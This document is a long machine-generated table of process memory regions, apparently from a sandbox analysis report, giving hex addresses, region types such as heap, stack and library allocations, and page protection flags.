2435D070000
|
heap
|
page read and write
|
||
2FD1AFE000
|
stack
|
page read and write
|
||
8240000
|
direct allocation
|
page read and write
|
||
72DA000
|
heap
|
page read and write
|
||
25170000
|
trusted library allocation
|
page read and write
|
||
29F538A1000
|
heap
|
page read and write
|
||
29F53A3C000
|
heap
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
4DAE000
|
trusted library allocation
|
page read and write
|
||
6EC26000
|
unkown
|
page readonly
|
||
16B5834E000
|
heap
|
page read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
28FF000
|
unkown
|
page read and write
|
||
16B5A37B000
|
trusted library allocation
|
page read and write
|
||
16B709A7000
|
heap
|
page read and write
|
||
6DC0000
|
heap
|
page read and write
|
||
29F53A3C000
|
heap
|
page read and write
|
||
8220000
|
direct allocation
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
2BD0000
|
heap
|
page read and write
|
||
29F5199A000
|
heap
|
page read and write
|
||
29F51607000
|
heap
|
page read and write
|
||
7FB40000
|
trusted library allocation
|
page execute and read and write
|
||
16B5A304000
|
trusted library allocation
|
page read and write
|
||
22D8E000
|
stack
|
page read and write
|
||
29F53A3B000
|
heap
|
page read and write
|
||
29F5360B000
|
heap
|
page read and write
|
||
7DD0000
|
heap
|
page read and write
|
||
29F5361D000
|
heap
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
22DA0000
|
trusted library allocation
|
page read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
5531000
|
trusted library allocation
|
page read and write
|
||
16B569A5000
|
heap
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
29F5360B000
|
heap
|
page read and write
|
||
4BBE000
|
stack
|
page read and write
|
||
22DD6000
|
trusted library allocation
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
29F5362B000
|
heap
|
page read and write
|
||
2435CF90000
|
heap
|
page read and write
|
||
7177000
|
heap
|
page read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
2506A000
|
heap
|
page read and write
|
||
7FFAAC430000
|
trusted library allocation
|
page read and write
|
||
2AD4000
|
heap
|
page read and write
|
||
274E000
|
stack
|
page read and write
|
||
22B2F000
|
stack
|
page read and write
|
||
251A2000
|
trusted library allocation
|
page read and write
|
||
2435CF70000
|
heap
|
page read and write
|
||
16B56697000
|
heap
|
page read and write
|
||
24D0000
|
heap
|
page read and write
|
||
29F5360B000
|
heap
|
page read and write
|
||
16B58BE3000
|
trusted library allocation
|
page read and write
|
||
7C6D000
|
stack
|
page read and write
|
||
251D0000
|
trusted library allocation
|
page read and write
|
||
28A0000
|
heap
|
page read and write
|
||
29F538A1000
|
heap
|
page read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
22DDD000
|
trusted library allocation
|
page read and write
|
||
5559000
|
trusted library allocation
|
page read and write
|
||
251D0000
|
trusted library allocation
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
7000000
|
trusted library allocation
|
page read and write
|
||
2EBF000
|
stack
|
page read and write
|
||
29F51694000
|
heap
|
page read and write
|
||
22C9C000
|
stack
|
page read and write
|
||
7E08000
|
heap
|
page read and write
|
||
29F535D5000
|
heap
|
page read and write
|
||
29F5362B000
|
heap
|
page read and write
|
||
160000
|
unkown
|
page readonly
|
||
29F53481000
|
heap
|
page read and write
|
||
29F53A3B000
|
heap
|
page read and write
|
||
29F535D5000
|
heap
|
page read and write
|
||
268E000
|
stack
|
page read and write
|
||
29F535AD000
|
heap
|
page read and write
|
||
7FFAAC1E6000
|
trusted library allocation
|
page execute and read and write
|
||
29F51998000
|
heap
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
8CF5000
|
direct allocation
|
page execute and read and write
|
||
7C00000
|
trusted library allocation
|
page read and write
|
||
2AE0000
|
heap
|
page read and write
|
||
165000
|
unkown
|
page readonly
|
||
7FFAAC100000
|
trusted library allocation
|
page read and write
|
||
2FD1FBB000
|
stack
|
page read and write
|
||
251F0000
|
trusted library allocation
|
page read and write
|
||
7DC0000
|
trusted library allocation
|
page read and write
|
||
29F535B8000
|
heap
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
2300D000
|
trusted library allocation
|
page read and write
|
||
29F534A8000
|
heap
|
page read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
17D000
|
unkown
|
page readonly
|
||
22AB0000
|
remote allocation
|
page read and write
|
||
16B68510000
|
trusted library allocation
|
page read and write
|
||
25180000
|
trusted library allocation
|
page read and write
|
||
2FD1D38000
|
stack
|
page read and write
|
||
82F0000
|
direct allocation
|
page read and write
|
||
7FFAAC320000
|
trusted library allocation
|
page read and write
|
||
7FFAAC1B6000
|
trusted library allocation
|
page read and write
|
||
16B566DE000
|
heap
|
page read and write
|
||
6EC26000
|
unkown
|
page readonly
|
||
29F5364C000
|
heap
|
page read and write
|
||
16B56694000
|
heap
|
page read and write
|
||
69EE000
|
stack
|
page read and write
|
||
6F90000
|
trusted library allocation
|
page read and write
|
||
22DBE000
|
trusted library allocation
|
page read and write
|
||
25310000
|
trusted library allocation
|
page read and write
|
||
29F53A3B000
|
heap
|
page read and write
|
||
2BE0000
|
heap
|
page read and write
|
||
29F5360B000
|
heap
|
page read and write
|
||
29F535DC000
|
heap
|
page read and write
|
||
25140000
|
trusted library allocation
|
page read and write
|
||
24FC0000
|
heap
|
page read and write
|
||
29F5360B000
|
heap
|
page read and write
|
||
7DF4BA850000
|
trusted library allocation
|
page execute and read and write
|
||
16B58DA6000
|
trusted library allocation
|
page read and write
|
||
25310000
|
trusted library allocation
|
page read and write
|
||
16B56840000
|
heap
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
25320000
|
trusted library allocation
|
page read and write
|
||
29F516BB000
|
heap
|
page read and write
|
||
22A0E000
|
stack
|
page read and write
|
||
7FFB1E3C5000
|
unkown
|
page readonly
|
||
696D000
|
stack
|
page read and write
|
||
7311000
|
heap
|
page read and write
|
||
25310000
|
trusted library allocation
|
page read and write
|
||
29F538A1000
|
heap
|
page read and write
|
||
29F5362A000
|
heap
|
page read and write
|
||
4C09000
|
stack
|
page read and write
|
||
251D0000
|
trusted library allocation
|
page read and write
|
||
29F5364C000
|
heap
|
page read and write
|
||
2FD1C36000
|
stack
|
page read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
25170000
|
trusted library allocation
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
7E0C000
|
heap
|
page read and write
|
||
7130000
|
trusted library allocation
|
page read and write
|
||
22E00000
|
trusted library allocation
|
page read and write
|
||
7CD0000
|
trusted library allocation
|
page read and write
|
||
29F5360B000
|
heap
|
page read and write
|
||
2F27000
|
heap
|
page read and write
|
||
8260000
|
direct allocation
|
page read and write
|
||
29F535D8000
|
heap
|
page read and write
|
||
81D0000
|
trusted library allocation
|
page read and write
|
||
2B2B000
|
stack
|
page read and write
|
||
16B59DBB000
|
trusted library allocation
|
page read and write
|
||
7BC7000
|
stack
|
page read and write
|
||
29F5360B000
|
heap
|
page read and write
|
||
16B56990000
|
trusted library allocation
|
page read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
251D0000
|
trusted library allocation
|
page read and write
|
||
7FFAAC3F0000
|
trusted library allocation
|
page read and write
|
||
29F5199E000
|
heap
|
page read and write
|
||
16B58CAA000
|
trusted library allocation
|
page read and write
|
||
29F5362B000
|
heap
|
page read and write
|
||
6DD0000
|
heap
|
page read and write
|
||
46EE000
|
stack
|
page read and write
|
||
80FC000
|
stack
|
page read and write
|
||
2900000
|
heap
|
page read and write
|
||
29F5360B000
|
heap
|
page read and write
|
||
7150000
|
trusted library allocation
|
page read and write
|
||
25140000
|
trusted library allocation
|
page read and write
|
||
7268000
|
heap
|
page read and write
|
||
29F535B9000
|
heap
|
page read and write
|
||
2FD1A7E000
|
stack
|
page read and write
|
||
473000
|
heap
|
page read and write
|
||
29F5364C000
|
heap
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
29F53649000
|
heap
|
page read and write
|
||
29F538A1000
|
heap
|
page read and write
|
||
29F538A1000
|
heap
|
page read and write
|
||
29F53A3B000
|
heap
|
page read and write
|
||
251A3000
|
trusted library allocation
|
page read and write
|
||
8280000
|
direct allocation
|
page read and write
|
||
2A267AD5000
|
heap
|
page read and write
|
||
6CCE000
|
stack
|
page read and write
|
||
400000
|
heap
|
page read and write
|
||
25160000
|
trusted library allocation
|
page read and write
|
||
75C7000
|
heap
|
page read and write
|
||
7FFAAC1BC000
|
trusted library allocation
|
page execute and read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
6FB0000
|
trusted library allocation
|
page read and write
|
||
251E0000
|
trusted library allocation
|
page read and write
|
||
8230000
|
direct allocation
|
page read and write
|
||
2760000
|
trusted library allocation
|
page read and write
|
||
4E0000
|
heap
|
page read and write
|
||
29F516BB000
|
heap
|
page read and write
|
||
27C0000
|
heap
|
page read and write
|
||
22E21000
|
heap
|
page read and write
|
||
7FFAAC3C0000
|
trusted library allocation
|
page read and write
|
||
6EC11000
|
unkown
|
page execute read
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
16B56900000
|
trusted library allocation
|
page read and write
|
||
72BF000
|
heap
|
page read and write
|
||
7FFAAC390000
|
trusted library allocation
|
page read and write
|
||
43AE000
|
stack
|
page read and write
|
||
2753000
|
trusted library allocation
|
page execute and read and write
|
||
25169000
|
trusted library allocation
|
page read and write
|
||
2FD14E3000
|
stack
|
page read and write
|
||
16B5A321000
|
trusted library allocation
|
page read and write
|
||
29CF000
|
stack
|
page read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
25170000
|
trusted library allocation
|
page read and write
|
||
29F5362B000
|
heap
|
page read and write
|
||
442E000
|
stack
|
page read and write
|
||
CF96B5C000
|
stack
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
251C0000
|
trusted library allocation
|
page read and write
|
||
29F538A1000
|
heap
|
page read and write
|
||
29F53744000
|
heap
|
page read and write
|
||
29F535D5000
|
heap
|
page read and write
|
||
74E0000
|
direct allocation
|
page read and write
|
||
71C0000
|
trusted library allocation
|
page read and write
|
||
320D000
|
trusted library allocation
|
page execute and read and write
|
||
29F5360B000
|
heap
|
page read and write
|
||
29F51661000
|
heap
|
page read and write
|
||
29F5360B000
|
heap
|
page read and write
|
||
2EE8000
|
heap
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
6DF6000
|
heap
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
4FE5000
|
remote allocation
|
page execute and read and write
|
||
7500000
|
direct allocation
|
page read and write
|
||
29F535BD000
|
heap
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
16B58220000
|
heap
|
page read and write
|
||
2FD1F3E000
|
stack
|
page read and write
|
||
29F53744000
|
heap
|
page read and write
|
||
25EE000
|
stack
|
page read and write
|
||
29F53604000
|
heap
|
page read and write
|
||
25200000
|
trusted library allocation
|
page read and write
|
||
7140000
|
trusted library allocation
|
page read and write
|
||
4ABC000
|
stack
|
page read and write
|
||
6DAD000
|
heap
|
page read and write
|
||
29F53A3C000
|
heap
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
229CF000
|
stack
|
page read and write
|
||
80BC000
|
stack
|
page read and write
|
||
22AB0000
|
remote allocation
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
708E000
|
stack
|
page read and write
|
||
16B70985000
|
heap
|
page read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
22DBB000
|
trusted library allocation
|
page read and write
|
||
22DB0000
|
trusted library allocation
|
page read and write
|
||
16B58726000
|
trusted library allocation
|
page read and write
|
||
16B58DB8000
|
trusted library allocation
|
page read and write
|
||
29F536EA000
|
heap
|
page read and write
|
||
7FFAAC1C0000
|
trusted library allocation
|
page execute and read and write
|
||
29F53493000
|
heap
|
page read and write
|
||
29F535EA000
|
heap
|
page read and write
|
||
22DCE000
|
trusted library allocation
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
2AD8000
|
heap
|
page read and write
|
||
29F5364B000
|
heap
|
page read and write
|
||
16B68501000
|
trusted library allocation
|
page read and write
|
||
6E07000
|
heap
|
page read and write
|
||
2A267AD4000
|
heap
|
page read and write
|
||
29F534A0000
|
heap
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page execute and read and write
|
||
29F5364B000
|
heap
|
page read and write
|
||
29F535D5000
|
heap
|
page read and write
|
||
321A000
|
trusted library allocation
|
page execute and read and write
|
||
29F53A3B000
|
heap
|
page read and write
|
||
2FD19FE000
|
stack
|
page read and write
|
||
29F5360B000
|
heap
|
page read and write
|
||
2A267980000
|
heap
|
page read and write
|
||
29F5360B000
|
heap
|
page read and write
|
||
251D0000
|
trusted library allocation
|
page read and write
|
||
29F535BD000
|
heap
|
page read and write
|
||
227FE000
|
stack
|
page read and write
|
||
29F538A1000
|
heap
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
2A90000
|
heap
|
page read and write
|
||
7FFAAC470000
|
trusted library allocation
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
446F000
|
stack
|
page read and write
|
||
29F5163C000
|
heap
|
page read and write
|
||
4DFA000
|
trusted library allocation
|
page read and write
|
||
71D0000
|
trusted library allocation
|
page read and write
|
||
289E000
|
stack
|
page read and write
|
||
251A3000
|
trusted library allocation
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
7580000
|
heap
|
page read and write
|
||
256F0000
|
trusted library allocation
|
page read and write
|
||
72DA000
|
heap
|
page read and write
|
||
16B5A339000
|
trusted library allocation
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
16B582B5000
|
heap
|
page read and write
|
||
25180000
|
trusted library allocation
|
page read and write
|
||
29F5360B000
|
heap
|
page read and write
|
||
4360000
|
heap
|
page read and write
|
||
29F5364C000
|
heap
|
page read and write
|
||
29F535AD000
|
heap
|
page read and write
|
||
29F535BD000
|
heap
|
page read and write
|
||
7FFAAC110000
|
trusted library allocation
|
page read and write
|
||
81E0000
|
trusted library allocation
|
page read and write
|
||
3216000
|
trusted library allocation
|
page execute and read and write
|
||
16B5A2E3000
|
trusted library allocation
|
page read and write
|
||
29F536A9000
|
heap
|
page read and write
|
||
28B5000
|
heap
|
page read and write
|
||
2754000
|
trusted library allocation
|
page read and write
|
||
29F53120000
|
remote allocation
|
page read and write
|
||
7180000
|
heap
|
page read and write
|
||
16B584F0000
|
heap
|
page execute and read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
16B56760000
|
heap
|
page read and write
|
||
29F5364C000
|
heap
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
29F5364C000
|
heap
|
page read and write
|
||
16B589B6000
|
trusted library allocation
|
page read and write
|
||
692E000
|
stack
|
page read and write
|
||
251E0000
|
trusted library allocation
|
page read and write
|
||
2FD2B8B000
|
stack
|
page read and write
|
||
29F53A3B000
|
heap
|
page read and write
|
||
25310000
|
trusted library allocation
|
page read and write
|
||
29F538A1000
|
heap
|
page read and write
|
||
16B70BF0000
|
heap
|
page read and write
|
||
322B000
|
trusted library allocation
|
page execute and read and write
|
||
29F538A1000
|
heap
|
page read and write
|
||
22B50000
|
direct allocation
|
page read and write
|
||
2A1E000
|
stack
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
251E0000
|
trusted library allocation
|
page execute and read and write
|
||
7BE0000
|
trusted library allocation
|
page execute and read and write
|
||
26CE000
|
stack
|
page read and write
|
||
29F5360B000
|
heap
|
page read and write
|
||
4E20000
|
trusted library allocation
|
page read and write
|
||
704E000
|
stack
|
page read and write
|
||
22CB8000
|
trusted library allocation
|
page read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
2780000
|
trusted library allocation
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
29F5364B000
|
heap
|
page read and write
|
||
251B2000
|
trusted library allocation
|
page read and write
|
||
29F5364B000
|
heap
|
page read and write
|
||
2AE2000
|
heap
|
page read and write
|
||
160000
|
unkown
|
page readonly
|
||
7120000
|
trusted library allocation
|
page execute and read and write
|
||
7D65000
|
trusted library allocation
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
23028000
|
trusted library allocation
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
29F535FE000
|
heap
|
page read and write
|
||
16B58A30000
|
trusted library allocation
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
46AE000
|
stack
|
page read and write
|
||
29F535EA000
|
heap
|
page read and write
|
||
7FFAAC410000
|
trusted library allocation
|
page read and write
|
||
7DE0000
|
heap
|
page read and write
|
||
22E20000
|
trusted library allocation
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
23017000
|
trusted library allocation
|
page read and write
|
||
22AEE000
|
stack
|
page read and write
|
||
41E0000
|
trusted library allocation
|
page read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
16B568A0000
|
heap
|
page read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
74F0000
|
direct allocation
|
page read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
72D7000
|
heap
|
page read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
16B58335000
|
heap
|
page read and write
|
||
7FFAAC102000
|
trusted library allocation
|
page read and write
|
||
525E000
|
stack
|
page read and write
|
||
2FD187F000
|
stack
|
page read and write
|
||
22D90000
|
trusted library allocation
|
page read and write
|
||
167000
|
unkown
|
page readonly
|
||
29F5366E000
|
heap
|
page read and write
|
||
16B5A30C000
|
trusted library allocation
|
page read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
4EB8000
|
trusted library allocation
|
page read and write
|
||
16B589AC000
|
trusted library allocation
|
page read and write
|
||
4520000
|
heap
|
page execute and read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
27F0000
|
trusted library allocation
|
page execute and read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
251D0000
|
trusted library allocation
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
6EC2F000
|
unkown
|
page readonly
|
||
4D00000
|
heap
|
page read and write
|
||
29F53A3C000
|
heap
|
page read and write
|
||
6EC10000
|
unkown
|
page readonly
|
||
27D8000
|
trusted library allocation
|
page read and write
|
||
44FD000
|
stack
|
page read and write
|
||
4CEC000
|
trusted library allocation
|
page read and write
|
||
39E000
|
stack
|
page read and write
|
||
6A55000
|
heap
|
page execute and read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
29F53487000
|
heap
|
page read and write
|
||
228BE000
|
stack
|
page read and write
|
||
817D000
|
stack
|
page read and write
|
||
7FFAAC3D0000
|
trusted library allocation
|
page read and write
|
||
251D0000
|
trusted library allocation
|
page read and write
|
||
2FD2A0E000
|
stack
|
page read and write
|
||
7530000
|
direct allocation
|
page read and write
|
||
71E0000
|
trusted library allocation
|
page read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
42DE000
|
stack
|
page read and write
|
||
16B58D84000
|
trusted library allocation
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
6D60000
|
heap
|
page read and write
|
||
25210000
|
trusted library allocation
|
page read and write
|
||
7E71000
|
heap
|
page read and write
|
||
7FFB1E3A0000
|
unkown
|
page readonly
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
2A267750000
|
heap
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
6FFD000
|
trusted library allocation
|
page read and write
|
||
6AF0000
|
heap
|
page read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
7FFAAC3B0000
|
trusted library allocation
|
page read and write
|
||
29F535DC000
|
heap
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
B7151DD000
|
stack
|
page read and write
|
||
29F535DC000
|
heap
|
page read and write
|
||
732A000
|
heap
|
page read and write
|
||
496000
|
heap
|
page read and write
|
||
72D0000
|
heap
|
page read and write
|
||
22AB0000
|
remote allocation
|
page read and write
|
||
29F538A1000
|
heap
|
page read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
7160000
|
trusted library allocation
|
page read and write
|
||
24FCE000
|
heap
|
page read and write
|
||
16B5669D000
|
heap
|
page read and write
|
||
16B58337000
|
heap
|
page read and write
|
||
7490000
|
direct allocation
|
page read and write
|
||
29F5364B000
|
heap
|
page read and write
|
||
7FFAAC3E0000
|
trusted library allocation
|
page read and write
|
||
52DC000
|
stack
|
page read and write
|
||
B7154FF000
|
unkown
|
page read and write
|
||
29F535BD000
|
heap
|
page read and write
|
||
68AB000
|
stack
|
page read and write
|
||
22FAB000
|
stack
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
7E78000
|
heap
|
page read and write
|
||
2FF0000
|
trusted library allocation
|
page read and write
|
||
5D0000
|
trusted library allocation
|
page read and write
|
||
251CC000
|
trusted library allocation
|
page read and write
|
||
723B000
|
stack
|
page read and write
|
||
71F0000
|
trusted library allocation
|
page read and write
|
||
6F68000
|
trusted library allocation
|
page read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
165000
|
unkown
|
page readonly
|
||
29F53A3C000
|
heap
|
page read and write
|
||
29F534A3000
|
heap
|
page read and write
|
||
16B597D6000
|
trusted library allocation
|
page read and write
|
||
6D4E000
|
stack
|
page read and write
|
||
7FFAAC330000
|
trusted library allocation
|
page read and write
|
||
2B69000
|
stack
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
22CA0000
|
heap
|
page read and write
|
||
25E9000
|
stack
|
page read and write
|
||
22DD1000
|
trusted library allocation
|
page read and write
|
||
81C0000
|
trusted library allocation
|
page read and write
|
||
2540E000
|
stack
|
page read and write
|
||
29F5362A000
|
heap
|
page read and write
|
||
B4F5000
|
direct allocation
|
page execute and read and write
|
||
29F5364C000
|
heap
|
page read and write
|
||
3227000
|
trusted library allocation
|
page execute and read and write
|
||
29F535B7000
|
heap
|
page read and write
|
||
25140000
|
trusted library allocation
|
page read and write
|
||
3210000
|
trusted library allocation
|
page read and write
|
||
25058000
|
heap
|
page read and write
|
||
25140000
|
heap
|
page read and write
|
||
29F51661000
|
heap
|
page read and write
|
||
2E75000
|
heap
|
page read and write
|
||
4E46000
|
trusted library allocation
|
page read and write
|
||
81BC000
|
stack
|
page read and write
|
||
7FFAAC3A0000
|
trusted library allocation
|
page read and write
|
||
82B0000
|
direct allocation
|
page read and write
|
||
23036000
|
trusted library allocation
|
page read and write
|
||
23FE9000
|
trusted library allocation
|
page read and write
|
||
6E09000
|
heap
|
page read and write
|
||
29F5360B000
|
heap
|
page read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
25170000
|
trusted library allocation
|
page read and write
|
||
7FFAAC460000
|
trusted library allocation
|
page read and write
|
||
25230000
|
trusted library allocation
|
page read and write
|
||
2F32000
|
heap
|
page read and write
|
||
56B9000
|
trusted library allocation
|
page read and write
|
||
29F53581000
|
heap
|
page read and write
|
||
22BD9000
|
stack
|
page read and write
|
||
29F5199E000
|
heap
|
page read and write
|
||
4D88000
|
trusted library allocation
|
page read and write
|
||
7FFAAC103000
|
trusted library allocation
|
page execute and read and write
|
||
16B5A308000
|
trusted library allocation
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
161000
|
unkown
|
page execute read
|
||
4CD4000
|
trusted library allocation
|
page read and write
|
||
6DB8000
|
heap
|
page read and write
|
||
72DA000
|
heap
|
page read and write
|
||
2F30000
|
heap
|
page read and write
|
||
24FE6000
|
heap
|
page read and write
|
||
7FFAAC300000
|
trusted library allocation
|
page read and write
|
||
25160000
|
trusted library allocation
|
page read and write
|
||
7FFAAC340000
|
trusted library allocation
|
page read and write
|
||
29F53A3C000
|
heap
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
2298E000
|
stack
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
7FFAAC11B000
|
trusted library allocation
|
page read and write
|
||
29F535D8000
|
heap
|
page read and write
|
||
2517D000
|
trusted library allocation
|
page read and write
|
||
16B58DD6000
|
trusted library allocation
|
page read and write
|
||
29F534A8000
|
heap
|
page read and write
|
||
29F516BB000
|
heap
|
page read and write
|
||
29F538A1000
|
heap
|
page read and write
|
||
29F536BE000
|
heap
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page read and write
|
||
29F53691000
|
heap
|
page read and write
|
||
7FFAAC440000
|
trusted library allocation
|
page read and write
|
||
29F5364B000
|
heap
|
page read and write
|
||
29F51999000
|
heap
|
page read and write
|
||
56B4000
|
trusted library allocation
|
page read and write
|
||
25170000
|
trusted library allocation
|
page read and write
|
||
6E72000
|
heap
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
7FFAAC350000
|
trusted library allocation
|
page read and write
|
||
2435CD90000
|
heap
|
page read and write
|
||
4CEB000
|
stack
|
page read and write
|
||
251D0000
|
trusted library allocation
|
page read and write
|
||
251C0000
|
trusted library allocation
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
22DCA000
|
trusted library allocation
|
page read and write
|
||
2FD1E3E000
|
stack
|
page read and write
|
||
29F5360B000
|
heap
|
page read and write
|
||
25230000
|
trusted library allocation
|
page read and write
|
||
8290000
|
direct allocation
|
page read and write
|
||
6D88000
|
heap
|
page read and write
|
||
29F5362B000
|
heap
|
page read and write
|
||
251A1000
|
trusted library allocation
|
page read and write
|
||
6EC11000
|
unkown
|
page execute read
|
||
6EC2F000
|
unkown
|
page readonly
|
||
7FFAAC2C0000
|
trusted library allocation
|
page execute and read and write
|
||
22B9A000
|
stack
|
page read and write
|
||
25210000
|
trusted library allocation
|
page read and write
|
||
167000
|
unkown
|
page readonly
|
||
8210000
|
direct allocation
|
page read and write
|
||
29F53498000
|
heap
|
page read and write
|
||
29F51695000
|
heap
|
page read and write
|
||
2522D000
|
stack
|
page read and write
|
||
68EE000
|
stack
|
page read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
29F538A1000
|
heap
|
page read and write
|
||
29F53484000
|
heap
|
page read and write
|
||
25170000
|
trusted library allocation
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
22F20000
|
heap
|
page execute and read and write
|
||
16B709DB000
|
heap
|
page read and write
|
||
4BCB000
|
stack
|
page read and write
|
||
27B0000
|
heap
|
page readonly
|
||
2530E000
|
stack
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
29F538A1000
|
heap
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
529F000
|
stack
|
page read and write
|
||
6FF0000
|
trusted library allocation
|
page read and write
|
||
7FFB1E3B6000
|
unkown
|
page readonly
|
||
29F5166C000
|
heap
|
page read and write
|
||
16B56910000
|
heap
|
page readonly
|
||
7FC20000
|
trusted library allocation
|
page execute and read and write
|
||
7170000
|
trusted library allocation
|
page read and write
|
||
2F8000
|
stack
|
page read and write
|
||
29F535F7000
|
heap
|
page read and write
|
||
251EE000
|
trusted library allocation
|
page read and write
|
||
165000
|
unkown
|
page readonly
|
||
29F5396E000
|
heap
|
page read and write
|
||
16B589EE000
|
trusted library allocation
|
page read and write
|
||
23FC1000
|
trusted library allocation
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
731E000
|
heap
|
page read and write
|
||
6FE0000
|
trusted library allocation
|
page read and write
|
||
228FD000
|
stack
|
page read and write
|
||
29F535EA000
|
heap
|
page read and write
|
||
29F53A3B000
|
heap
|
page read and write
|
||
29F53481000
|
heap
|
page read and write
|
||
29F5362B000
|
heap
|
page read and write
|
||
29F5360B000
|
heap
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
251A0000
|
trusted library allocation
|
page read and write
|
||
29F538A1000
|
heap
|
page read and write
|
||
7BF0000
|
trusted library allocation
|
page read and write
|
||
16B58DCC000
|
trusted library allocation
|
page read and write
|
||
48EE000
|
stack
|
page read and write
|
||
4C8E000
|
stack
|
page read and write
|
||
4710000
|
heap
|
page read and write
|
||
22E20000
|
heap
|
page read and write
|
||
29F5366E000
|
heap
|
page read and write
|
||
7480000
|
heap
|
page readonly
|
||
167000
|
unkown
|
page readonly
|
||
81F0000
|
trusted library allocation
|
page read and write
|
||
3B0000
|
heap
|
page read and write
|
||
251D0000
|
trusted library allocation
|
page read and write
|
||
16B58D70000
|
trusted library allocation
|
page read and write
|
||
4E8000
|
heap
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
4620000
|
heap
|
page read and write
|
||
29F53A3B000
|
heap
|
page read and write
|
||
2FD1CB9000
|
stack
|
page read and write
|
||
16B68521000
|
trusted library allocation
|
page read and write
|
||
6A50000
|
heap
|
page execute and read and write
|
||
6DE5000
|
remote allocation
|
page execute and read and write
|
||
25AB000
|
stack
|
page read and write
|
||
251B0000
|
trusted library allocation
|
page read and write
|
||
256D0000
|
trusted library allocation
|
page execute and read and write
|
||
5C0000
|
trusted library section
|
page read and write
|
||
29F5364B000
|
heap
|
page read and write
|
||
74B0000
|
direct allocation
|
page read and write
|
||
